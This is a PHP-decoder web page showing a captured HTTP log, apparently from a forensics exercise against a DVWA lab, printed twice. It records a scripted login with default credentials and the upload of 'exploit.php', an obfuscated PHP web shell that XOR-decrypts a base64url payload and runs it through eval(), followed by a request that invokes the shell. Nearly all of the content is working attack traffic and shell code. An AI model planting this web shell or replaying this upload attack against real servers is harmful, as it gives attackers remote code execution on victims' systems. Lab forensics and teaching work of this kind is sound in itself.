Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

GET /vulnerabilities/upload/ HTTP/1.1 Host: www.drsepsforensicsfun.com User-Agent: pytho..

Decoded Output download

GET /vulnerabilities/upload/ HTTP/1.1 
Host: www.drsepsforensicsfun.com 
User-Agent: python-requests/2.22.0 
Accept-Encoding: gzip, deflate 
Accept: */* 
Connection: keep-alive 
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc 
 
GET /login.php HTTP/1.1 
Host: www.drsepsforensicsfun.com 
User-Agent: python-requesAts/2.22.0 
Accept-Encoding: gzip, deflate 
Accept: */* 
Connection: keep-alive 
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc 
 
POST /login.php/login.php HTTP/1.1 
Host: www.drsepsforensicsfun.com 
User-Agent: python-requests/2.22.0 
Accept-Encoding: gzip, deflate 
Accept: */* 
Connection: keep-alive 
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low 
Content-Length: 88 
Content-Type: application/x-www-form-urlencoded 
 
username=admin&password=password&Login=Login&user_token=6dd623b1d961de480f1b6ec8c44917faGET /login.php/index.php HTTP/1.1 
Host: www.drsepsforensicsfun.com 
User-Agent: python-requests/2.22.0 
Accept-Encoding: gzip, deflate 
Accept: */* 
Connection: keep-alive 
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low 
 
GET /vulnerabilities/upload/ HTTP/1.1 
Host: www.drsepsforensicsfun.com 
User-Agent: python-requests/2.22.0 
Accept-Encoding: gzip, deflate 
Accept: */* 
Connection: keep-alive 
Cookie: security=low; PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low 
 
GET /dvwa/js/add_event_listeners.js HTTP/1.1 
Host: www.drsepsforensicsfun.com 
User-Agent: python-requests/2.22.0 
Accept-Encoding: gzip, deflate 
Accept: */* 
Connection: keep-alive 
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low 
 
POST /vulnerabilities/upload/ HTTP/1.1 
Host: www.drsepsforensicsfun.com 
User-Agent: python-requests/2.22.0 
Accept-Encoding: gzip, deflate 
Accept: */* 
Connection: keep-alive 
Cookie: security=low; PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low 
Content-Length: 1284 
Content-Type: multipart/form-data; boundary=7b0932bb9aaddf05434a5ee8bd74524d 
 
--7b0932bb9aaddf05434a5ee8bd74524d 
Content-Disposition: form-data; name="MAX_FILE_SIZE" 
 
100000 
--7b0932bb9aaddf05434a5ee8bd74524d 
Content-Disposition: form-data; name="uploaded" 
 
exploit.php 
--7b0932bb9aaddf05434a5ee8bd74524d 
Content-Disposition: form-data; name="Upload" 
 
Upload 
--7b0932bb9aaddf05434a5ee8bd74524d 
Content-Disposition: form-data; name="uploaded"; filename="exploit.php" 
 
<?php 
function base64url_encode($data) { 
  return rtrim(strtr(base64_encode($data), '+/', '-_'), '='); 
} 
 
function base64url_decode($data) { 
  return base64_decode(str_pad(strtr($data, '-_', '+/'), strlen($data) % 4, '=', STR_PAD_RIGHT)); 
}  
function x($k, $p){ 
		$c = ""; 
		$l = strlen($k); 
		$pl = strlen($p); 
		for($i = 0; $i < $pl; $i++) { 
			$c .= $k[$i % $l] ^ $p[$i]; 
		} 
		return $c; 
} 
$k = 'bdbd9167c0eedf53'; 
$content = "czNwM2hyCg%3D%3D=IhcbF01UWx9BRw0KBQtcEUtf"; 
$split = explode("=", $content); 
if (strcmp(base64url_decode($split[0]),'s3p3hr')) { 
$decoded = base64url_decode($split[1]); 
		$decrypted = x($k,$decoded); 
		ob_start(); 
		try { 
			eval($decrypted); 
		} 
		catch (exception $e) { 
			print($e->getMessage()); 
		} 
		$o = ob_get_contents(); 
		$c = x($k, $o); 
		$e = base64url_encode($c); 
		ob_end_clean(); 
		print($e . "
"); 
} 
?> 
 
--7b0932bb9aaddf05434a5ee8bd74524d-- 
POST /hackable/uploads/exploit.php HTTP/1.1 
Host: www.drsepsforensicsfun.com 
User-Agent: python-requests/2.22.0 
Accept-Encoding: gzip, deflate 
Accept: */* 
Connection: keep-alive 
Content-Type: application/x-www-form-urlencoded 
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low 
Content-Length: 41 
 
czNwM2hyCg%3D%3D=IhcbF01UWx9BRw0KBQtcEUtf

Did this file decode correctly?

Original Code

GET /vulnerabilities/upload/ HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc

GET /login.php HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requesAts/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc

POST /login.php/login.php HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
Content-Length: 88
Content-Type: application/x-www-form-urlencoded

username=admin&password=password&Login=Login&user_token=6dd623b1d961de480f1b6ec8c44917faGET /login.php/index.php HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low

GET /vulnerabilities/upload/ HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: security=low; PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low

GET /dvwa/js/add_event_listeners.js HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low

POST /vulnerabilities/upload/ HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: security=low; PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
Content-Length: 1284
Content-Type: multipart/form-data; boundary=7b0932bb9aaddf05434a5ee8bd74524d

--7b0932bb9aaddf05434a5ee8bd74524d
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
--7b0932bb9aaddf05434a5ee8bd74524d
Content-Disposition: form-data; name="uploaded"

exploit.php
--7b0932bb9aaddf05434a5ee8bd74524d
Content-Disposition: form-data; name="Upload"

Upload
--7b0932bb9aaddf05434a5ee8bd74524d
Content-Disposition: form-data; name="uploaded"; filename="exploit.php"

<?php
function base64url_encode($data) {
  return rtrim(strtr(base64_encode($data), '+/', '-_'), '=');
}

function base64url_decode($data) {
  return base64_decode(str_pad(strtr($data, '-_', '+/'), strlen($data) % 4, '=', STR_PAD_RIGHT));
} 
function x($k, $p){
		$c = "";
		$l = strlen($k);
		$pl = strlen($p);
		for($i = 0; $i < $pl; $i++) {
			$c .= $k[$i % $l] ^ $p[$i];
		}
		return $c;
}
$k = 'bdbd9167c0eedf53';
$content = "czNwM2hyCg%3D%3D=IhcbF01UWx9BRw0KBQtcEUtf";
$split = explode("=", $content);
if (strcmp(base64url_decode($split[0]),'s3p3hr')) {
$decoded = base64url_decode($split[1]);
		$decrypted = x($k,$decoded);
		ob_start();
		try {
			eval($decrypted);
		}
		catch (exception $e) {
			print($e->getMessage());
		}
		$o = ob_get_contents();
		$c = x($k, $o);
		$e = base64url_encode($c);
		ob_end_clean();
		print($e . "\n");
}
?>

--7b0932bb9aaddf05434a5ee8bd74524d--
POST /hackable/uploads/exploit.php HTTP/1.1
Host: www.drsepsforensicsfun.com
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=fpq2rs8mf7ad4pdc081hue7fmc; security=low
Content-Length: 41

czNwM2hyCg%3D%3D=IhcbF01UWx9BRw0KBQtcEUtf

Function Calls

strtr 1
strlen 1
explode 1
base64url_decode 1

Variables

$k bdbd9167c0eedf53
$data czNwM2hyCg%3D%3D
$split [{'key': None, 'value': 'czNwM2hyCg%3D%3D'}, {'key': None, 'value': 'IhcbF01UWx9BRw0KBQtcEUtf'}]
$content czNwM2hyCg%3D%3D=IhcbF01UWx9BRw0KBQtcEUtf

Stats

MD5 26e9d48bdeb9e454446c2dbed556acd2
Eval Count 0
Decode Time 61 ms